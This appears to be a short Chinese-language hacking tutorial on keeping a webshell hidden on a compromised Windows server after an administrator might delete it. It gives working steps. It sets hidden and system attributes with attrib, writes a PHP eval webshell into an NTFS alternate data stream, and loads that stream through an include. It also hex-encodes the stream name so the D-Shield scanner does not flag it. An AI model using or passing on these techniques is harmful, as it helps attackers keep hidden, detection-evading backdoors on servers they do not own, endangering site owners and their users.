Part 1 前言

　　辛辛苦苦拿下的shell，幾天沒看，管理員給刪了。

Part 2 隱藏

　　隱藏的技巧很多，廢話不多說直接開始。

一. attrib +s +h

　　創建系統隱藏文件。

attrib +s +a +r +h / attrib +s +h 文件名

　　查看隱藏文件

二. 利用ADS隱藏文件

　　NTFS交換數據流（Alternate　Data　Streams，簡稱ADS）是NTFS磁盤格式的一個特性，在NTFS文件系統下，每個文件都可以存在多個數據流。通俗的理解，就是其它文件可以“寄宿”在某個文件身上，而在資源管理器中卻只能看到宿主文件，找不到寄宿文件。利用ADS數據流，我們可以做很多有趣的事情。(抄的)

　　1.首先創建ADS隱藏文件

在命令行，echo一個數據流進去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

這樣就生成了一個不可見的 index.php:shell.jpg

　　可用 dir /r 命令來查看

　　修改與刪除

修改:

　　進入文件所在目錄，notepad index.php:shell.jpg

如何刪除index.php:shell.jpg呢？

　　直接刪除index.php

　　2. 文件包含

　　我們生成了index.php:shell.jpg，可以通過包含文件的方式來使用。

<?php include(‘index.php:shell.jpg‘)?>

　　還可以用上面學的隱藏include.php

　　3. 免殺

隱藏了也不行兄dei，D盾一掃瞬間爆炸。

把 index.php:shell.jpg hex編碼

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex編碼
$b="a";
include(PACK(‘H*‘,$$b))
?>

php後門隱藏技巧